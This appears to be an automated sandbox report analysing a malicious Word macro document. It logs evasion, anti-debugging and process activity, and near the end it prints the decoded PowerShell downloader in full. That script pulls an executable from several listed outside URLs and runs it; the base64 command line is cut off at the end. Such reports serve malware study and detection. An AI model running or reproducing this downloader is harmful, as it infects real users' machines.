Source: C:\Users\user\209.exeCode function: 3_2_0042EAB8 IsWindowVisible,IsIconic,3_2_0042EAB8
Source: C:\Users\user\209.exeCode function: 3_2_00403100 IsIconic,3_2_00403100
Source: C:\Users\user\209.exeCode function: 3_2_00403300 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,3_2_00403300
Source: C:\Users\user\209.exeCode function: 3_2_00427655 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,3_2_00427655
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\dvbthunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\dvbthunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Users\user\209.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_4-4589
Source: C:\Windows\System32\dvbthunk.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_5-4635
Contains functionality to enumerate running servicesShow sources
Source: C:\Users\user\209.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,4_2_003EE20C
Source: C:\Windows\System32\dvbthunk.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,6_2_0021E20C
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Found evasive API chain (date check)Show sources
Source: C:\Users\user\209.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_3-54741
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\209.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_3-54963
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\209.exeAPI coverage: 2.4 %
Source: C:\Windows\System32\dvbthunk.exeAPI coverage: 9.4 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2312Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 564Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\209.exe TID: 2348Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\dvbthunk.exe TID: 2468Thread sleep time: -60000s >= -30000sJump to behavior
Checks the free space of harddrivesShow sources
Source: C:\Users\user\209.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\209.exeCode function: 3_2_004305BD lstrlenA,FindFirstFileA,FindClose,3_2_004305BD
Source: C:\Users\user\209.exeCode function: 3_2_0042885D __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_0042885D
Contains functionality to query system informationShow sources
Source: C:\Users\user\209.exeCode function: 3_2_0043E50E VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,3_2_0043E50E
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Program exit pointsShow sources
Source: C:\Users\user\209.exeAPI call chain: ExitProcess graph end nodegraph_3-55248
Source: C:\Users\user\209.exeAPI call chain: ExitProcess graph end nodegraph_4-4534
Source: C:\Windows\System32\dvbthunk.exeAPI call chain: ExitProcess graph end nodegraph_5-4572
Source: C:\Windows\System32\dvbthunk.exeAPI call chain: ExitProcess graph end nodegraph_6-4519
Source: C:\Windows\System32\dvbthunk.exeAPI call chain: ExitProcess graph end nodegraph_6-4528
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\209.exeCode function: 3_2_00442D24 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00442D24
Contains functionality to create guard pages, often used to hinder reverse engineering and debuggingShow sources
Source: C:\Users\user\209.exeCode function: 3_2_0043E50E VirtualProtect ?,-00000001,00000104,?3_2_0043E50E
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\209.exeCode function: 3_2_0045A702 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,3_2_0045A702
Contains functionality to read the PEBShow sources
Source: C:\Users\user\209.exeCode function: 3_2_00402960 mov eax, dword ptr fs:[00000030h]3_2_00402960
Source: C:\Users\user\209.exeCode function: 3_2_003C0467 mov eax, dword ptr fs:[00000030h]3_2_003C0467
Source: C:\Users\user\209.exeCode function: 3_2_003C0C0C mov eax, dword ptr fs:[00000030h]3_2_003C0C0C
Source: C:\Users\user\209.exeCode function: 3_2_003C1743 mov eax, dword ptr fs:[00000030h]3_2_003C1743
Source: C:\Users\user\209.exeCode function: 3_2_003E12CD mov eax, dword ptr fs:[00000030h]3_2_003E12CD
Source: C:\Users\user\209.exeCode function: 3_2_003E1E04 mov eax, dword ptr fs:[00000030h]3_2_003E1E04
Source: C:\Users\user\209.exeCode function: 4_2_001F0C0C mov eax, dword ptr fs:[00000030h]4_2_001F0C0C
Source: C:\Users\user\209.exeCode function: 4_2_001F0467 mov eax, dword ptr fs:[00000030h]4_2_001F0467
Source: C:\Users\user\209.exeCode function: 4_2_001F1743 mov eax, dword ptr fs:[00000030h]4_2_001F1743
Source: C:\Users\user\209.exeCode function: 4_2_003E1E04 mov eax, dword ptr fs:[00000030h]4_2_003E1E04
Source: C:\Users\user\209.exeCode function: 4_2_003E12CD mov eax, dword ptr fs:[00000030h]4_2_003E12CD
Source: C:\Windows\System32\dvbthunk.exeCode function: 5_2_00270C0C mov eax, dword ptr fs:[00000030h]5_2_00270C0C
Source: C:\Windows\System32\dvbthunk.exeCode function: 5_2_00270467 mov eax, dword ptr fs:[00000030h]5_2_00270467
Source: C:\Windows\System32\dvbthunk.exeCode function: 5_2_00271743 mov eax, dword ptr fs:[00000030h]5_2_00271743
Source: C:\Windows\System32\dvbthunk.exeCode function: 5_2_00391E04 mov eax, dword ptr fs:[00000030h]5_2_00391E04
Source: C:\Windows\System32\dvbthunk.exeCode function: 5_2_003912CD mov eax, dword ptr fs:[00000030h]5_2_003912CD
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_001F0C0C mov eax, dword ptr fs:[00000030h]6_2_001F0C0C
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_001F0467 mov eax, dword ptr fs:[00000030h]6_2_001F0467
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_001F1743 mov eax, dword ptr fs:[00000030h]6_2_001F1743
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_00211E04 mov eax, dword ptr fs:[00000030h]6_2_00211E04
Source: C:\Windows\System32\dvbthunk.exeCode function: 6_2_002112CD mov eax, dword ptr fs:[00000030h]6_2_002112CD
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\209.exeCode function: 3_2_003E14F2 GetProcessHeap,RtlAllocateHeap,3_2_003E14F2
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\209.exeCode function: 3_2_00448BF8 SetUnhandledExceptionFilter,3_2_00448BF8
Source: C:\Users\user\209.exeCode function: 3_2_00442D24 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00442D24
Source: C:\Users\user\209.exeCode function: 3_2_0044ADDD __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0044ADDD
Source: C:\Users\user\209.exeCode function: 3_2_00439CC7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00439CC7

HIPS / PFW / Operating System Protection Evasion:

barindex
Document contains VBA stomped code (only p-code) potentially bypassing AV detectionShow sources
Source: gyF9tONev4.docmOLE indicator, VBA stomping: true
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $Qixgxuwsmwipf='Jrrmrgvdgp';$Lsbblkhsbkuk = '209';$Iuclkeap='Zawsfeswe';$Wjewvadqympw=$env:userprofile+'\'+$Lsbblkhsbkuk+'.exe';$Sscxysueq='Isksuxebevui';$Xqirzqen=.('ne'+'w-objec'+'t') NET.WebcliENT;$Mntcrtepi='http://bolehprediksi.com/wp-includes/ifrEFSqSw/*http://www.designindia.live/js/ycCKqHl/*http://www.hair2mpress.com/oeiwosk36j3ss/wtuds/vedMDhc/*http://www.worldnoticiasonline.com/wp-content/uploads/vvhaa000vj-mq98v-19988518/*https://9jabliss.com/oirxio/nwkddr/'."sPL`iT"([char]42);$Uopzosaiwq='Nmmfkyrhsehnk';foreach($Vgohksofia in $Mntcrtepi){try{$Xqirzqen."dow`N`lOa`dFIle"($Vgohksofia, $Wjewvadqympw);$Cylxjjlddefc='Zvuqukrpykv';If ((.('Get-I'+'tem') $Wjewvadqympw)."l`EngTh" -ge 33624) {([wmiclass]'win32_Process')."cr`e`ATe"($Wjewvadqympw);$Pgcptaxklsrp='Ibfwspsinw';break;$Anzacsysox='Iytpkbyeiih'}}catch{}}$Yzvbhsfzj='Klqzrjukyp'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e JABRAGkAeABnAHgAdQB3AHMAbQB3AGkAcABmAD0AJwBKAHIAcgBtAHIAZwB2AGQAZwBwACcAOwAkAEwAcwBiAGIAbABrAGgAcwBiAGsAdQBrACAAPQAgACcAMgAwADkAJwA7ACQASQB1AGMAbABrAGUAYQBwAD0AJwBaAGEAdwBzAGYAZQBzAHcAZQAnADsAJABXAGoAZQB3AHYAYQBkAHEAeQBtAHAAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATABzAGIAYgBsAGsAaABzAGIAawB1AGsAKwAnAC4AZQB4AGUAJwA7ACQAUwBzAGMAeAB5AHMAdQBlAHEAPQAnAEkAcwBrAHMAdQB4AGUAYgBlAHYAdQBpACcAOwAkAFgAcQBpAHIAegBxAGUAbgA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAFQALgBXAGUAYgBjAGwAaQBFAE4AVAA7ACQATQBuAHQAYwByAHQAZQBwAGkAPQAnAGgAdAB0AHAAOgAvAC8AYgBvAGwAZQBoAHAAcgBlAGQAaQBrAHMAaQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AaQBmAHIARQBGAFMAcQBTAHcALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGUAcwBpAGcAbgBpAG4AZABpAGEALgBsAGkAdgBlAC8AagBzAC8AeQBjAEMASwBxAEgAbAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGgAYQBpAHIAMgBtAHAAcgBlAHMAcwAuAGMAbwBtAC8AbwBlAGkAdwBvAHMAawAzADYAagAzAHMAcwAvAHcAdAB1AGQAcwAvAHYAZQBkAE0ARABoAGMALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB3AG8AcgBsAGQAbgBvAHQAaQBjAGkAYQBzAG8AbgBsAGkAbgBlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvAHYAdgBoAGEAYQAwADAAMAB2AGoALQBtAHEAOQA4AHYALQAxADkAOQA4ADgANQAxADgALwAqAGgAdAB0AHAAcwA6AC8ALwA5AGoAYQBiAGwAaQBzAHMALgBjAG8AbQAvAG8AaQByAHgAaQBvAC8AbgB3AGsAZABkAHIALwAnAC4AI